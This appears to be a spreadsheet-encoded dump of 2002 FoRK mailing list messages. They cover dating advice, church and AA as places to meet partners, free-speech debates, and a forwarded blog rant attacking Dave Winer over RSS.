&gt; doing any different than having Scientology and who ever else
&gt; state-side who takes the whim evoking the DMCA to close down foreign
&gt; sites they deem inappropriate?  At least the Chinese make it voluntary
&gt; and ask politely, rather than just sending legal musclemen first off.
&gt; 
&gt; -- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">At 7:13 AM -0400 on 9/18/02, Rodent of Unusual Size wrote:
&gt; SmartGroups, I think.Dave Farber's Interesting People list just went over to
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</si>
  <si>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&gt;&gt;&gt;&gt;&gt; "E" == Eirikur Hallgrimsson  writes:    E&gt; You just can't tell important things from a picture and a few
    E&gt; words.  It's not how we are built.  There's no geek code for
    E&gt; the heart and soul.Nor is there a Turing Test, even for someone with whom you've spent 11
years, boom, bust and boom again, and 3 children (trust me) There is
no magic litmus test other than the totally empirical: "Try it and
see""String bags full of oranges
 And matters of the heart,
 People laugh at /anything/
 And things just fall apart."
 - michael leunigThe only real test, the only /sensible/ test, is to look back and
realize your relationship has lasted 50 years and see no reason to
believe it couldn't last another 50.  In the absense of 50 years of
actual (ahem) hands-on experiential data, a photo and a few words are
as good as any, provided you are prepared for the dynamics of it.Love is a verb.  Sex is a /shared/ pursuit.  There is no
'relation-ship', there is only the crew.  sail away!-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 18 September 2002 06:47 am, Robert Harley wrote:
&gt; ....and with the crucial hair feature enabled!That got a good laugh out of me.   Just saying "crucial hair feature" 
improves my day immeasurably.I've done a fair amount of thinking about the "media intermediated" meeting 
thing.   It seriously loses for reasons like Rohit's just encountered.   
One is both rejected for trivial reasons and rejects for the same.
Some people loudly defend that these choices are not trivial.I'd have never met my best friend if I had to pick her out of a crowd for 
getting to know.   I was a teen at the time, but I won't say I'm much 
improved at being able to spot "interesting" at a distance.   Interesting 
isn't an external thing.  I have that brought home to me again every so 
often.  I may think that interesting people dress differently or whatever, 
but that's total superstition.   How do I know what your version of 
creative attire is?  Maybe it's purely functional.I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party.....well, if you can't hear the conversation they are having, or if 
on the net all you have is a photo.....You just can't tell important things from a picture and a few words.  It's 
not how we are built.   There's no geek code for the heart and soul.
(And if there were people would lie and game the system.)
It's too easy to say "Oh, no!  He's a geek!"   or "She's a CAT person, 
ick!" when you might have a great time together.We are constructed to form alliances based on how we fit together as 
people, how we feel in the other person's company, how well we partner on 
tasks and recreation.   This is all entirely speculative based on nothing 
but superstitious association unless you actually have time in the 
person's company.   Which is why we tend to be screwed when our circle of 
exposure shrinks after school.Personally, as a writer, the whole internet meet &amp; email thing ought to 
work better for me than it does for other people, but interestingly, it 
doesn't.   I have to put out the same amount of effort and reap about the 
same poor results.    I have to think it's not the people, but the tool.An aside (okay, yes, I'm a tool geek):  Speed Dating
Speed Dating (aka 7 Minute Dating) is a live-action stab at actual time in 
the company of a variety of people, compressed into one event.   I think 
it's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give it several points for effort 
though. I guess my impression that even the Speed Dating thing doesn't do much for 
you means that the traditional advice of "join activities groups" is 
actually sound.Eirikur
</t>
  </si>
  <si>
    <t xml:space="preserve">Gordon Mohr quoted:
&gt;# French Writer Tried As Anti-Islam, Protest Erupts
&gt;# By Caroline Brothers
&gt;#
&gt;# PARIS (Reuters) - Provocative French novelist Michel Houellebecq
&gt;# faced a Paris court on Tuesday for allegedly inciting racial hatred
&gt;# by calling Islam "the stupidest religion" and its holy book the
&gt;# Koran a depressing read.
&gt;#
&gt;# The case, brought against him by four Muslim groups, is a cause
&gt;# celebre reminiscent of the Salman Rushdie affair, pitting freedom of
&gt;# expression against religious sensitivities.Very reminiscent indeed.  Ayatollah Chirac has decreed a death
sentence on Houellebecq and liked-minded fundamentalists have offered
millions of euros bounty for his head, so he has gone into hiding
under police protection for a few years.Or maybe some handful of Muslims are acting uppity and dragging him to
court under "hate speech" laws make a point about people not showin'
dem da massive respect dat dey deserve, especially these days.Or maybe some journo is trying to fill column inches on a boring day.
BTW I read Houellebecq's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anti-hero writes little stories
about animals talking philosophical mumbo-jumbo to each other, quoted
inline in full for pages on end.It starts out:"On Friday evening, I was invited to a party with some colleagues from
work.  There were about thrity of us, all professionals aged from
twenty-five to forty.  At one point, some cunt started getting
undressed. She took off her T-shirt, then her bra, then her skirt, all
the while making unbelievable faces.  She pranced around for a few
seconds, then she started getting dresesd again because she didn't
know what else to do.  Anyway she never sleeps with anyone.  Which
underlines the absurdity of her behaviour.After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and it's downhill from there!
R
</t>
  </si>
  <si>
    <t xml:space="preserve">Hear hear, Gary.  I'm living with a guy right now who I met at a party, 
emailed with for 2 weeks, then powie!  We were both looking at similar 
goals in life in general, had some attraction for each other, and decided 
to wing it.  I can't say what's going to happen tomorrow, but right now, 
and for the past few months, we've been happy.  Onward Ho!  (:
CindyOn 18 Sep 2002, Gary Lawrence Murphy wrote:&gt; &gt;&gt;&gt;&gt;&gt; "E" == Eirikur Hallgrimsson  writes:
&gt; 
&gt;     E&gt; You just can't tell important things from a picture and a few
&gt;     E&gt; words.  It's not how we are built.  There's no geek code for
&gt;     E&gt; the heart and soul.
&gt; 
&gt; Nor is there a Turing Test, even for someone with whom you've spent 11
&gt; years, boom, bust and boom again, and 3 children (trust me) There is
&gt; no magic litmus test other than the totally empirical: "Try it and
&gt; see"
&gt; 
&gt; "String bags full of oranges
&gt;  And matters of the heart,
&gt;  People laugh at /anything/
&gt;  And things just fall apart."
&gt;  - michael leunig
&gt; 
&gt; The only real test, the only /sensible/ test, is to look back and
&gt; realize your relationship has lasted 50 years and see no reason to
&gt; believe it couldn't last another 50.  In the absense of 50 years of
&gt; actual (ahem) hands-on experiential data, a photo and a few words are
&gt; as good as any, provided you are prepared for the dynamics of it.
&gt; 
&gt; Love is a verb.  Sex is a /shared/ pursuit.  There is no
&gt; 'relation-ship', there is only the crew.  sail away!
&gt; 
&gt; -- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t>Perhaps we should start a grass roots movement here on FoRK and send the 
nice lady a few emails on his behalf? Better yet, why don't we see on 
who can write the best personals ad for Rohit? I'll post the best one to 
Craigs' list on his behalf. The winner can take me out to dinner. (No, 
really, I'm charming.)Elias
Robert Harley wrote:&gt;Pity.  Reading that woman's ad and knowing Rohit for years, they sound
&gt;like a match made in heaven.  But why, oh, why, keep that shaved-head
&gt;photo on prominent display???  There are lots of photos of Rohit
&gt;looking rather dashing, and with the crucial hair feature enabled!
&gt;
&gt;R
&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 18 Sep 2002, Tom wrote:&gt; The others are on mailing list only status for now. A few of the
&gt; groups I was in that are run by others are harder to deal with since
&gt; many folks just dont want to have to deal with the inconvienence of a
&gt; understanding.I've terminated a number of my own mailing lists at yahoogroups many
months ago because of similiar sentiments. I've tried lobbying other
people to move, but with about zero success.I've got currently only one own mailing list there, which I'm going to
move as soon as it is technically possible (which is my ISP's problem,
basically). After that, I intend to kick yahoogroups for good.
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1I know it's not the popular choice for a lot of people, but I'd
suggest, um, church. :-). Like Woody Allen said, 90% of life is
showing up, right?
Almost anyone can find a church where the sermons don't make you bust
out laughing, and you're set. I, for instance, am a Unitarian, which,
as someone once observed, is merely a decompression chamber between a
real church and a golf course. (ObUUJokes: Mid 70's bumper-sticker:
"Honk if you're not sure"; Lenny Bruce: "Did you hear about how the
Klan burned a question mark on the Unitarian's lawn?"; "Unitarians
would rather go to a discussion group about heaven than to heaven
itself."; "Unitarians pray 'to whom it may concern'"; etc...)But, seriously, folks, my teenage-adopted denomination (I'm, um,
lapsed, on several fronts, a Dutch-Reformed-turned-atheist father and
an agnostic mother who used to be a southern Baptist of some stripe
or another) and frankly limousine liberal secular-humanist
congregation is about as orthogonal to my present
congenital-Republican small-l libertarian turned anarchocapitalist
politics as it is possible to be (except for the secular-humanist
bit...), and I still go pretty regularly, though not as much as I
used to. Heck, the older I get the less of the divine I believe in.
I'm asymptotically approaching my father's atheism, these days, and I
show up at least once a month. Nice folks though, when I can keep a
civil tongue in my head -- smart too, when I can't and end up arguing
with them. :-).
Anyway, if *I* can end up hitched, anyone can. Talk about orthogonal.
I met my practically-socialist state-education-bureaucrat wife one
year after I started, moved in with her 6 weeks later :-), married
her 2 years after that, and I wasn't even trying meet women. I was
just looking to make friends as I was new in town.
The trick to the church thing is, whatever denomination/congregation
you end up in, expect to end up with a mate, not a date. I mean, some
guys manage to stay single, but most, like me, don't. You can
practically see the laser-sights light up when you walk into a
room...That's because, of course, most churches are *run* by women. Most
regular attendants are women. Hell, 65% of all new *ministers*, in
protestant denominations, at least, are women. No matter your age,
looks, intelligence, whatever, you'll end up surrounded by women.
You'll be outnumbered, even several to one -- some of whom are at
least better looking than you are. :-). The only place where there
are *more* women running things is in grass-roots Republican politics
- -- but I won't go there, I promise.
If I may make a presumption here, since you brought it up, I figure
that between the sophistication and diversity of the subcontinent's
religions, and the ubiquity of Indians in various stages of
assimilation in So/NoCal, you can find some place to hang out near
you, Rohit. You probably don't even have to go, um, native, like I
did -- backsliding on my own ostensibly rational godless upbringing
and becoming, horrors, a Unitarian...Cheers,
RAH-----BEGIN PGP SIGNATURE-----
Version: PGP 7.5iQA/AwUBPYjCBcPxH8jf3ohaEQI2vwCbB2UkMyii/XwKQvvJFSWlMMRheBsAmwUB
jDmfQrNRQED3LmW6V8YutN54
=vQ/A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</si>
  <si>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On Wed, 18 Sep 2002, R. A. Hettinga wrote:
--]I know it's not the popular choice for a lot of people, but I'd
--]suggest, um, church. :-). Like Woody Allen said, 90% of life is
--]showing up, right?
--]I think another venue for finding people is the workplace. As a contractor
I have had the opertunity to meet lots of eligables over the course of my
wandering workhistory.My wife was my Task Order Manager years ago, thats  how we met. Her joke
is that she is still my Task Order Manager but now I dont get paid:)-By starting up your own companies or working in sterile thinklabs you are
cutting yourself off from one heck of a fertile ground for linkages....the
common office.I like the shurch idea as well. Other ideas...Book circles, geocaching groups, heck Rhorho your still young enough to
hit the campus mixers...and I mean the social stuff not the techtech
events.
Above all, ask yourself whats important to you..Life, you either life it or you waste it.
-tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Church, AA, same diff?;-).Cheers,
RAH
http://www.newsmax.com/archive/print.shtml?a=2002/9/18/161934NewsMax.comWednesday, September 18, 2002AA Meetings the Hottest Place to Meet Women With Big BucksIf you're looking to hook up with female millionaires you could try some of
the classier restaurants or clubs, but the best place of all is a certain
New York City Alcoholics Anonymous meeting.According to a Details magazine story cited in the New York Post, "the No.
1 location to score a megabucks babe is an Alcoholics Anonymous center on
[New York's] Upper East Side."It's the choicest meeting in town, right next to the Ralph Lauren store"
on Madison Avenue, which features "rich vulnerable women," the mag's
October issue says.AA officials were not overjoyed by having the address of their meeting
place published, or being cited as the "in" place for finding loaded women
- or rather, women who are loaded."The purpose of our meetings is to let people share their experiences and
help others find sobriety. It is not a place to pick up women!" an AA
spokesman told The Post.O.K.Return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</si>
  <si>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On Wed, 18 Sep 2002, R. A. Hettinga wrote:--]Church, AA, same diff?AA is sort of church with ashtrays.</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 18 Sep 2002, R. A. Hettinga wrote:
--]AA Meetings the Hottest Place to Meet Women With Big BucksAnd, as always, you can take a page out of Fight Club and start showing up
at all sorts of support groups. Look what it did for Marla and Jack..."JACK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
</t>
  </si>
  <si>
    <t xml:space="preserve">advice to the lovelorn haikuserendipity
pilots synchronicity:
turn the next corner.-----Original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BucksAnd, as always, you can take a page out of Fight Club and start showing up
at all sorts of support groups. Look what it did for Marla and Jack..."JACK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
</t>
  </si>
  <si>
    <t xml:space="preserve">At 11:06 AM 9/18/02 -0400, R. A. Hettinga wrote:&gt;Dave Farber's Interesting People list just went over to
&gt;It always was, I think. Meng Weng Wong, the founder of pobox, listbox et al 
was a student of Dave Farber's.Listbox just upgraded its software, however.Udhay-- 
((Udhay Shankar N)) ((udhay @ pobox.com)) ((www.digeratus.com))
</t>
  </si>
  <si>
    <t xml:space="preserve">less obscure haiku buy a puppy, ro!
they are chick magnets. master
ventriloquism.gg-----Original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BucksAnd, as always, you can take a page out of Fight Club and start showing up
at all sorts of support groups. Look what it did for Marla and Jack..."JACK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
</t>
  </si>
  <si>
    <t xml:space="preserve">And the ever popular...
Or bring a baby,
Provided you do not own,
Women come, at baby's cry.
GS&gt; less obscure haiku GS&gt; buy a puppy, ro!
GS&gt; they are chick magnets. master
GS&gt; ventriloquism.GS&gt; ggGS&gt; -----Original Message-----
GS&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Tom
GS&gt; Sent: Wednesday, September 18, 2002 7:13 PM
GS&gt; To: R. A. Hettinga
GS&gt; Cc: fork@spamassassin.taint.org
GS&gt; Subject: Re: AA Meetings the Hottest Place to Meet Women With Big Bucks
GS&gt; On Wed, 18 Sep 2002, R. A. Hettinga wrote:
GS&gt; --]AA Meetings the Hottest Place to Meet Women With Big BucksGS&gt; And, as always, you can take a page out of Fight Club and start showing up
GS&gt; at all sorts of support groups. Look what it did for Marla and Jack...GS&gt; "JACK You can't have *both* parasites. You take blood parasites and --
GS&gt; MARLA I want brain parasites.
GS&gt; She opens another dryer and does the same thing again. PG 19
GS&gt; JACK Okay. I'll take blood parasites and I'll take organic brain dementia
GS&gt; and --
GS&gt; MARLA I want that.
GS&gt; JACK You can't have the whole brain!
GS&gt; MARLA So far, you have four and I have two!
GS&gt; JACK Well, then, take blood  parasites. Now, we each have three.
GS&gt; MARLA So, we each have three -- that's six. What  about the seventh day? I
GS&gt; want ascending bowel cancer.
GS&gt; JACK *I* want ascending bowel cancer.
GS&gt; MARLA That's your favorite, too? Tried to slip it by me, huh?
GS&gt; JACK We'll split it. You get it the first and third Sunday of the month.
GS&gt; MARLA Deal."
-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Tom wrote:&gt;On Wed, 18 Sep 2002, R. A. Hettinga wrote:
&gt;--]I know it's not the popular choice for a lot of people, but I'd
&gt;--]suggest, um, church. :-). Like Woody Allen said, 90% of life is
&gt;--]showing up, right?
&gt;--]
&gt;
&gt;I think another venue for finding people is the workplace. As a contractor
&gt;I have had the opertunity to meet lots of eligables over the course of my
&gt;wandering workhistory.
&gt;
&gt;My wife was my Task Order Manager years ago, thats  how we met. Her joke
&gt;is that she is still my Task Order Manager but now I dont get paid:)-
&gt;  
&gt;
Sure if you're willing to risk firing, lawsuits, etc. The last full time 
job I had the sexual harassement seminar
was pretty clear - yes you can have relationships at the office, but its 
extremely difficult, and the pitfalls are
horrendous.Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">This sort of thing is, in my (limited?) experience, increasingly a thing 
of the past. Not one person I know has found it worth the risk to pursue 
a relationship with someone in the workplace. It's terrible to think we 
could litigate our way into extinction...!Elias
Owen Byrne wrote:&gt; ... The last full time job I had the sexual harassement seminar
&gt; was pretty clear - yes you can have relationships at the office, but 
&gt; its extremely difficult, and the pitfalls are horrendous. 
</t>
  </si>
  <si>
    <t xml:space="preserve">
--- begin forwarded text
Subject: [dgc.chat] First public release of NeuDist Distributed Transaction
Clearing	Framework
From: Pelle Braendgaard 
To: dgcchat@lists.goldmoney.com
Cc: Digital Bearer Settlement List , DGCChat
, xmlx 
Date: 19 Sep 2002 00:05:39 -0500
Reply-To: I'm happy to announce the first public release of NeuDistNeuDist is an Open Source Software framework for building applications
for the Neubia Distributed Clearing Platform.This release contains early java libraries and documentation that would
primarily be of interest to developers.Talking about documentation, it is still a bit slim and mainly oriented
towards people with experience in Java/XML development.There are currently no sample applications, but they will be available
in the next release.The framework currently contains the following:
- Classes for creating "Named Objects", which are authenticated using
digital signatures within a hierarchy.
- Storage framework for "Named Objects".
- Simple XML-Signature implementation (Almost certainly not yet
interoperable with other implementations)
- Simple SOAP client
- Simple Servlet API for handling SOAP requests based on "Named
  Objects".
- Current types of "Named Objects" include:
    NameSpace objects -- for maintaining the NameSpace Authentication
 	Framework
    AuthenticationTickets -- for doing web site authentication using
	digital signatures.
Next major release is scheduled to contain:
 - Core:
	hard coded root public key, for authenticating top level 	NameSpaces
 - Signing Services:
	Implementation of web based signing services
	End user hosted signing service
 - Example User Authentication Application
 - Example Payment System based on NeuDistI will be expanding the documentation over the next few weeks. This will
cover not only more indepth technical documentation, but also higher
level documentation about the business side of things.Read more about NeuDist or download our early version at
http://neudist.org
I would love to hear your questions and suggestions. To discuss it
further please join neudist-discuss@lists.sourceforge.net
You can join it at:
http://lists.sourceforge.net/mailman/listinfo/neudist-discuss
Regards
Pelle
-- 
Antilles Software Ventures SA 		http://neubia.com/asv
My Web Log Live and Direct from Panama	http://talk.org
Views of an EconoFist			http://econofist.comsubscribe: send blank email to dgcchat-join@lists.goldmoney.com
unsubscribe: send blank email to dgcchat-leave@lists.goldmoney.com
digest: send an email to dgcchat-request@lists.goldmoney.com
with "set yourname@yourdomain.com digest=on" in the message body---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
</t>
  </si>
  <si>
    <t>This is for those that have interacted with D Winer"Dave's idea of love is fucking everyone else without so much as a reach
around.  You're supposed to just shut up and take it."http://winerlog.inspiredsites.net/===========Who's the real monster?
It seems good Ol' Uncle Dave is once again trying to savage anyone that
dares to disagree with him.  It seems Ben, Kevin and Bill are making too
strong a case.  So here we Dave's attempt to fool you into thinking they're
some sort of monsters, violent ones no less.Anyone who works with Hemenway or Kearney should be aware that these people
are nothing less than monsters, who will stoop to any level to get their
way.Yeah sure Dave, whatever you need to believe.The truth is these folks do a fine job of actually helping others and
improving RSS in general.  Each with their own brand of attitude, to be
sure, but they seem to be pretty focused on actually helping things move
forward.  How is that being monstrous?Is Dave trying to slander their good names and thus poison the public's
perception of them?  If you haven't already, contact them and ask them how
they feel about this foolishness.
 9/18/02; 10:07:38 AM - DiscussDave deflects what he can't take the time to understand
It's really quite pitiful.  When normal people don't understand something
they usually try learning about it.  They read up, ask questions and seek
the help of those that understand it.  This before shooting their mouths off
and looking like fools.What Dave does is just the opposite.Posts a link to something he doesn't understand
Get's a bunch of e-mail from people who do understand it
Derides the idea as being 'too much trouble' and blogs it.
Expects others to do research for him
Abuses anyone who tries to help him
Pontificates, incorrectly, about only part of the issue
Realizes he's been a fool but refuses to correct himself
Plods forward pedantically trying to defend his idiocy
Tries making the educated people look like fools.
Sends private e-mails to them trying to scare them off.
Exposes any private e-mail they write, out of context.
Deflects and runs off to some new topic, repeats from #1
His continued diatribes about RSS-1.0 and it's use of RDF reveal this to be
true.  Dave doesn't get the idea of the semantic web.  He'd rather have you
follow his stupid ideas than dare admit that the work of others is worth
trying.One reader wrote to us with a good analogy.  "It's like that movie The
Poseidon Adventure.  Dave's like the purser ranting and raving that the
passengers should follow him and march toward the bow.  I don't know about
you but I'd rather be with the fat lady swimming toward the engine room.
The ship's fucking sinking and I don't want to be following the idiot."Dave's idea of love is fucking everyone else without so much as a reach
around.  You're supposed to just shut up and take it.  After all, why would
good ol' Uncle Dave want to hurt you?  It's all about love, right?  To hell
with asking you if you want to get shafted.  And if you dare complain, he
savages you.  Then he tries to make everyone think you're the one causing
all the trouble.We've news for you Dave, we're wise to your tactics and we're talking
amongst ourselves about it.  We're routing around you damaging behavoir.
That's where we're coming from.If you have an example of how you've tried to help Dave, please drop us an
e-mail about it.  We'll keep it strictly confidential of course.  Send it
along to zaphod@egroups.com
 9/12/02; 10:13:11 AM - Discuss
Trying to talk with Dave is like trying to wrestle a pig...
The trouble is, you get dirty and the pig seems to like it.Another developer tries talking to Dave and discovers it's fundamentally
impossible:His basic response was just that RDF was a joke and the Semantic Web
developers are doing a terrible job.In the span of less than five minutes Dave makes such an ass of himself that
people at other tables start whispering "that guy is an idiot..."The zaphodim, however, are veteran pig wrestlers.  If you've got a similar
tale from the mud pit, be sure to drop us a line at: zaphod@egroups.com.
 9/11/02; 2:17:58 PM - Discuss (1 response)
Aha! Some backing down by the whining one?
It would appear the 'dictator release' strategy that Dave's been trying on
his crappy little set of RSS hacks is failing to gain support.I'm going to push back the caveat-removing on the 2.0 spec by 24 hours.
Still have work to do on the sample file, I want to look into the RFC for
time-date specs, and get started on the Radio implementation of 2.0. I have
to prepare for Seybold tomorrow, and I want to a little memorial for 9-11. A
busy few days for a guy still recovering. Also, it would be great if people
who make content tools could review the 2.0 spec and see if there are any
deal-stoppers.Hell yeah there are deal stoppers, like nobody wants it nor will they use
it!The poor Radio customers!  The poor Salon blog users!  They're going to be
dragged unwillingly into producing XML content that nobody will use!  So
with the flip of his mighty upgrade switch Dave is going to turn all their
content into totally unsupported garbage!!!Ya better speak up now folks otherwise your content is going to start
getting rejected!Of course at the same time Dave tries to play the sympathy card.  What utter
fucking nonsense.  This past weekend, the blogosphere excoriates him for his
'blame America' bullshit.  Then the RSS community tells him to get stuffed
with his dictator release of RSS.  Now he's trying to pretend we should be
nice to him because he's still recovering?Uh, Dave, if you want to take a rest from the battle then stop picking
fights.  We'll still kick your ass regardless.  That's what years of your
abusing people has gotten you Dave.  No sympathy anymore, none whatsoever.
 9/11/02; 1:56:10 PM - Discuss
Dave is Scary on 9/11Posted on Scripting News on 9/10/2002:
Note: During the day tomorrow there will be no updates to Scripting News.
I'll be in SF at Seybold, leading a discussion on Web Services for
Publishing with people from Amazon, Apple, Google and Jake Savin of
UserLand. I may be able to update my Radio weblog, but only if there's
something really important to report. So best wishes for a happy and safe
9-11.
What kind of asshole wishes people a happy 9/11??!?!?!?!??!! Obviously
someone who doesn't have a clue nor lost anyone in the tragedy.
 9/11/02; 7:56:06 AM - Discuss
Yeow and we though we were harsh!
Wow, apparently Dave's sticking his neck out quite far these days.  Craig
Schamp practically keel-hauls him with this one.  He wraps it up with:The man seems to show over and over that he's nothing more than a whining
buffoonGive that man an honorary Zaphodim membership card and secret decoder ring!Related links over at PhotoDude, Richard Bennett, Andrea Harris, Reid Stott,
Jeff Jarvis, Ipse Dixit, and the Fat Guy.
 9/9/02; 12:29:45 PM - Discuss
RSS 2.0: code name "Hitler"
If Dave tries to steamroll RSS 2.0 through without formal community
consensus, here now we call it the "Hitler" release of 2.0."No objections"?  No, he means "No objections I choose to hear."Dave is simply not listening.  People are objecting all over.
 9/6/02; 9:00:02 AM - Discuss
Referral log funnies
Every now and then we check the referral logs to see what's pointing back to
us.  We sincerely apologize to the pool soul that used this search.
 9/5/02; 12:15:07 PM - Discuss
Luserland Attempts to Trademark "RSS"
Dave has waxed and waned about intellectual property rights and how any
BigCo that tries to patent its technology or methods is corrupt or morally
bankrupt. Scripting News is full of examples.So we found it surprising, as did many others, when Luserland software tried
to patent the term 'RSS' back in 2000. Here's the patent application:http://tarr.uspto.gov/servlet/tarr?regser=serial&amp;entry=78025336This was apparently just between the start of the RSS 1.0 development
efforts, and the publication of the specification. Winer knew about the RSS
1.0 stuff - indeed, he complained about it bitterly at the time.Could Dave be any more transparent?!?!??!?!!!!!!!Since when has Dave been required to follow anything he says he wants others
to do??? A good quote from before he filed the patent application:Tim O'Reilly says patents are OK, he's just against stupid patents. In the
spirit of Touch of Grey, Tim man, patents are lock-in of the worst kind.
There's no way to route around them. 9/4/02; 6:06:51 AM - Discuss
When's a Permalink not a Permalink?
When Dave writes an item, then removes it!!!!!!!!!!! The permalink links to
nothing at that point. So apparently the "perma-" part in permalink is
permanent. For everyone except Dave. Too bad his little attempt at a
definition fails to mention this...!!!!!!!!!
 9/2/02; 6:16:03 PM - Discuss</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;It seems good Ol' Uncle Dave is once again trying to savage anyone that
&gt;dares to disagree with him.  It seems Ben, Kevin and Bill are making too
&gt;strong a case.  So here we Dave's attempt to fool you into thinking they're
&gt;some sort of monsters, violent ones no less.
&gt;
&gt;Anyone who works with Hemenway or Kearney should be aware that these people
&gt;are nothing less than monsters, who will stoop to any level to get their/me coughs... I'm part of the Monster club. They call me... Hemenway! -- 
Morbus Iff ( i assault your sensibilities! )
Culture: http://www.disobey.com/ and http://www.gamegrene.com/
Tech: http://www.oreillynet.com/pub/au/779 - articles and weblog
icq: 2927491 / aim: akaMorbus / yahoo: morbus_iff / jabber.org: morbus
</t>
  </si>
  <si>
    <t xml:space="preserve">Heh, ten years ago saying the exact same words was most definitely not 
"parroting the party line".It was even less so thirty years ago. My story remains the same, take it 
or leave it. I've said the same words to white supremacists as to 
suburban leftist punks as to homeys as to French Irish, etc. etc.:I don't have to agree with anything you say. I *am* obligated to defend 
to the death your right to say it. I don't give a rat's ass where you 
say it, even in France. I don't care where the political pendulum has 
swung currently.ChuckOn Tuesday, September 17, 2002, at 10:38 AM, Owen Byrne wrote:&gt; On Tue, Sep 17, 2002 at 10:19:13AM -0700, Chuck Murcko wrote:
&gt;&gt; Probably because we have this pesky 1st Amendment thing here. Still,
&gt;&gt; lots of us in the States have developed a disturbing tendency to shout
&gt;&gt; down or (in recent years) shackle in legal BS opinions, thoughts, and
&gt;&gt; individual behaviors we don't agree with.
&gt;&gt;
&gt;
&gt; Except that parroting the party line doesn't really require much
&gt; freedom of speech. Now if you had posted something from a left of
&gt; center source, you would have been shouted down in flames, buried in
&gt; ad hominem attacks, and probably get your name added to an FBI list.
&gt;
&gt;
&gt; Besides the basic rule in the United States now is "I'll defend your
&gt; rights to say anything you want, but if it isn't appropriately
&gt; neoconish, well, don't expect to work":
&gt;
&gt;
&gt; HHS Seeks Science Advice to Match Bush Views
&gt;
&gt; By Rick Weiss
&gt; Washington Post Staff Writer
&gt; Tuesday, September 17, 2002; Page A01
&gt;
&gt; The Bush administration has begun a broad restructuring of the
&gt; scientific advisory committees that guide federal policy in areas such
&gt; as patients' rights and public health, eliminating some committees
&gt; that were coming to conclusions at odds with the president's views and
&gt; in other cases replacing members with handpicked choices.
&gt; ...
&gt; http://www.washingtonpost.com/wp-dyn/articles/A26554-2002Sep16.html
&gt;
&gt; Owen
&gt;
</t>
  </si>
  <si>
    <t>Chuck Murcko wrote:&gt; Heh, ten years ago saying the exact same words was most definitely not 
&gt; "parroting the party line".
&gt;
&gt; It was even less so thirty years ago. My story remains the same, take 
&gt; it or leave it. I've said the same words to white supremacists as to 
&gt; suburban leftist punks as to homeys as to French Irish, etc. etc.:
&gt;
&gt; I don't have to agree with anything you say. I *am* obligated to 
&gt; defend to the death your right to say it. I don't give a rat's ass 
&gt; where you say it, even in France. I don't care where the political 
&gt; pendulum has swung currently.
&gt;
&gt; Chuck
I had to laugh at Rumsfield yesterday - when he was heckled by 
protestors, he said something like "They couldn't do that in Iraq." 
Meanwhile, from what I could tell, the protestors were being arrested.Owen</t>
  </si>
  <si>
    <t xml:space="preserve">Chuck Murcko wrote:
&gt;[...stuff...]Yawn.R
</t>
  </si>
  <si>
    <t xml:space="preserve">R. A. Hettinga:
&gt;Church, AA, same diff?It's difficult to measure which is the greater
liability in a potential mate, religiosity or
alcoholism.
_________________________________________________________________
Join the worldï¿½s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Owne Byrne:
&gt;Sure if you're willing to risk firing, lawsuits, etc. The last full time 
&gt;job I had the sexual harassement seminar was pretty clear - yes you can 
&gt;have relationships at the office, but its extremely difficult, and the 
&gt;pitfalls are
&gt;horrendous.Despite that, this is how a lot of couples meet.
People tease me about Carolyn, that I just hired
a lot of software engineering babes, and then
chose the one I liked best. ;-)
_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
In a message dated 9/19/2002 7:46:37 AM, chuck@topsail.org writes:&gt;That means *you* can't say anything may not be FoRKed or printed or 
&gt;whatever. You have the choice to ignore it
That's not what the First Amendment says at all. It says that Congress cannot 
say what can't be FoRKed. FoRK can establish any rules it wants. Similarly, 
The New York Times gets to choose what news IT thinks is "fit to print." If 
the Times chose not to print anything about, say, Rosie O'Donnell, it would 
be exercising its First Amendment rights, just as much as it would be if it 
chose to print something Rosie O'Donnell doesn't like. The necessary 
corollary of the freedom to say/publish what one wants is the freedom to 
refuse to publish or say what one doesn't like. The alternative is a 
state-controlled press that reprints government press releases and calls them 
news.The question of what is or is not FoRKed is (except for libel or other 
specific exceptions) not a matter of law, but a matter of what the 
"publisher" (if any) decides or the "community" (if any) negotiates or does 
as a matter of custom.For my part, I'd rather people didn't use FoRK as a place in which to dump an 
expression of their political beliefs.Tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Robert Harley:
&gt;&gt;BTW, I wasn't aware that the 1st Amendment mandated that crap must be 
&gt;&gt;FoRKed.Chuck Murcko :
&gt;It doesn't, BTW. It says the right to free speech shall not be abridged. 
&gt;That means *you* can't say anything may not be FoRKed or printed or 
&gt;whatever.Actually, it means just the opposite. The first
amendment guarantees Harley's right to say just
that. For the outlets where he has editorial
control, it even guarantees his right to CENSOR
content published through those outlets. The
first amendment doesn't limit Harley's speech,
and it is neutral with regard to the selection
policies of FoRK and other private venues._________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx
</t>
  </si>
  <si>
    <t xml:space="preserve">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"present." This enables them to chat and message each other, search across
  other people's Magi environment, and work jointly on relevant documents
  highly productively. With Magi collaboration, in tandem with WebEx
  conferencing, the savings can be huge in terms of travel costs, phone bills,
  and, most importantly, timely completion of projects and tasks.  "In order to realise the full potential of Web meetings, best-of-breed
  services are needed to eliminate time and geographical boundaries," says
  Bernard Hulme, Tadpole's group chief executive. "The powerful combination
  of Endeavors' Magi and WebEx's communications technologies will assist
  global work teams to better meet critical business goals and deadlines by
